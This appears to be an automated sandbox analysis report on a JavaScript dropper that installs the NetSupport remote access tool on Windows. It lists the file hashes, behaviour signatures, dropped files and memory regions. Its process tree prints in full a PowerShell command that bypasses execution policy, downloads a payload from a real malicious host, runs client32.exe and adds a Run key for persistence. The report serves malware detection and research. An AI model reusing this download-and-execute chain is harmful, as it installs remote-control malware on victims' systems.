Analysis

  • max time kernel
    143s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-08-2023 08:37

General

  • Target

    315031503150.js

  • Size

    3KB

  • MD5

    dbb06f31df24adaa18b4d68d5d074a6c

  • SHA1

    2a1e7ff42820b6c676dab52a780583532d231ebc

  • SHA256

    bd8e3a5f784682fdff952802136474313c36c6fcf53d08c78d6016f432809358

  • SHA512

    383e37290ff075673c9ade6799f8f33f7975e4cb6a7580c0463d4cdf9c33d18d8199dadb71769c46281fdb461077967d6ec9eb1e70dfb29e8140b354c5b60776

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://instalfrio.cl/destination.txt

exe.dropper

http://instalfrio.cl/destination.txt

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\315031503150.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1404
      • C:\Users\Admin\AppData\Roaming\D\client32.exe
        "C:\Users\Admin\AppData\Roaming\D\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:5072

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxnvbgbw.urg.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\D\HTCTL32.DLL

    Filesize

    320KB

    MD5

    2d3b207c8a48148296156e5725426c7f

    SHA1

    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

    SHA256

    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

    SHA512

    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

  • C:\Users\Admin\AppData\Roaming\D\HTCTL32.DLL

    Filesize

    320KB

    MD5

    2d3b207c8a48148296156e5725426c7f

    SHA1

    ad464eb7cf5c19c8a443ab5b590440b32dbc618f

    SHA256

    edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

    SHA512

    55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

  • C:\Users\Admin\AppData\Roaming\D\MSVCR100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\D\NSM.LIC

    Filesize

    259B

    MD5

    3a88847f4bbf7199a2161ed963fe88ef

    SHA1

    8629803adb6af84691dc5431b6590df14bad4a61

    SHA256

    a680947aba5cf3316be50f1ec6a0d8bf72f7d7ca79d91430c26e24680eddd35e

    SHA512

    2b6408e7334946655045914b2cfa14dcfb39502f64ffafad784717a8ca036b73928bd7a5b02d650d8698357c54c31cac11a705baed0e1e7a3a07d659a2104e02

  • C:\Users\Admin\AppData\Roaming\D\PCICHEK.DLL

    Filesize

    18KB

    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • C:\Users\Admin\AppData\Roaming\D\PCICL32.dll

    Filesize

    3.5MB

    MD5

    0806dd2faf75ef07931f0a0148dabe8a

    SHA1

    d578f3590af19108a45f1053e7752c72e4e71757

    SHA256

    1bf1d7e36a7fcae7d5df7a5b926ffd5fe07ecc3b3412d7818a9139f501083c51

    SHA512

    8c4628da32f25b10f432c7b5af03bd76368f44d8c9c017502e79c1a53548635a4c12c489bdd775bbea888dbab3a51859403e64ca79e39b0938260f1819936ef7

  • C:\Users\Admin\AppData\Roaming\D\client32.exe

    Filesize

    114KB

    MD5

    f36a7294ff7aa92571a3fd7c91282dd5

    SHA1

    849e777458ef42b3138f33f6e50623246eafb7a7

    SHA256

    42c2d35457abce2fea3897ba5e569f51b74b40302ff15b782e3b20b0aa00b34e

    SHA512

    285165bdf774e4db062c996dc148dfd6a5263d89a7ae3e1bb193afb9513cd95a40dc8689ab1fd5c56b90fbdd65c6b05cfe2a3cbde4195d5b8bef239eac315145

  • C:\Users\Admin\AppData\Roaming\D\client32.exe

    Filesize

    114KB

    MD5

    f36a7294ff7aa92571a3fd7c91282dd5

    SHA1

    849e777458ef42b3138f33f6e50623246eafb7a7

    SHA256

    42c2d35457abce2fea3897ba5e569f51b74b40302ff15b782e3b20b0aa00b34e

    SHA512

    285165bdf774e4db062c996dc148dfd6a5263d89a7ae3e1bb193afb9513cd95a40dc8689ab1fd5c56b90fbdd65c6b05cfe2a3cbde4195d5b8bef239eac315145

  • C:\Users\Admin\AppData\Roaming\D\client32.exe

    Filesize

    114KB

    MD5

    f36a7294ff7aa92571a3fd7c91282dd5

    SHA1

    849e777458ef42b3138f33f6e50623246eafb7a7

    SHA256

    42c2d35457abce2fea3897ba5e569f51b74b40302ff15b782e3b20b0aa00b34e

    SHA512

    285165bdf774e4db062c996dc148dfd6a5263d89a7ae3e1bb193afb9513cd95a40dc8689ab1fd5c56b90fbdd65c6b05cfe2a3cbde4195d5b8bef239eac315145

  • C:\Users\Admin\AppData\Roaming\D\client32.ini

    Filesize

    715B

    MD5

    b4e1abba1a71f64b59c0eedf8feda711

    SHA1

    6f135a10ff49676e1daa049444e0f7fa1ddb8858

    SHA256

    76b38949526934b916a42ba95d09abf2d6635b945044a6578551e1034d1ed75d

    SHA512

    08e9266315c68f43c0c84a95979597b2dcac465784b199ee6a6c058bcff5b12207d6700abe4b16531356ea432a68e7541a87aed6a1e65c4090ed38886debdf01

  • C:\Users\Admin\AppData\Roaming\D\msvcr100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\D\msvcr100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\D\pcicapi.dll

    Filesize

    32KB

    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • C:\Users\Admin\AppData\Roaming\D\pcicapi.dll

    Filesize

    32KB

    MD5

    dcde2248d19c778a41aa165866dd52d0

    SHA1

    7ec84be84fe23f0b0093b647538737e1f19ebb03

    SHA256

    9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

    SHA512

    c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

  • C:\Users\Admin\AppData\Roaming\D\pcichek.dll

    Filesize

    18KB

    MD5

    a0b9388c5f18e27266a31f8c5765b263

    SHA1

    906f7e94f841d464d4da144f7c858fa2160e36db

    SHA256

    313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

    SHA512

    6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

  • C:\Users\Admin\AppData\Roaming\D\pcicl32.dll

    Filesize

    3.5MB

    MD5

    0806dd2faf75ef07931f0a0148dabe8a

    SHA1

    d578f3590af19108a45f1053e7752c72e4e71757

    SHA256

    1bf1d7e36a7fcae7d5df7a5b926ffd5fe07ecc3b3412d7818a9139f501083c51

    SHA512

    8c4628da32f25b10f432c7b5af03bd76368f44d8c9c017502e79c1a53548635a4c12c489bdd775bbea888dbab3a51859403e64ca79e39b0938260f1819936ef7

  • memory/1404-5-0x000001CBDC5F0000-0x000001CBDC612000-memory.dmp

    Filesize

    136KB

  • memory/1404-61-0x00007FF852050000-0x00007FF852B11000-memory.dmp

    Filesize

    10.8MB

  • memory/1404-15-0x000001CBDC6E0000-0x000001CBDC6F0000-memory.dmp

    Filesize

    64KB

  • memory/1404-19-0x000001CBDC680000-0x000001CBDC68A000-memory.dmp

    Filesize

    40KB

  • memory/1404-14-0x00007FF852050000-0x00007FF852B11000-memory.dmp

    Filesize

    10.8MB

  • memory/1404-13-0x000001CBDC6E0000-0x000001CBDC6F0000-memory.dmp

    Filesize

    64KB

  • memory/1404-16-0x000001CBDC6E0000-0x000001CBDC6F0000-memory.dmp

    Filesize

    64KB

  • memory/1404-17-0x000001CBDC6E0000-0x000001CBDC6F0000-memory.dmp

    Filesize

    64KB

  • memory/1404-20-0x000001CBDEBA0000-0x000001CBDEBB2000-memory.dmp

    Filesize

    72KB

  • memory/1404-12-0x000001CBDC6E0000-0x000001CBDC6F0000-memory.dmp

    Filesize

    64KB

  • memory/1404-11-0x000001CBDC6E0000-0x000001CBDC6F0000-memory.dmp

    Filesize

    64KB

  • memory/1404-10-0x00007FF852050000-0x00007FF852B11000-memory.dmp

    Filesize

    10.8MB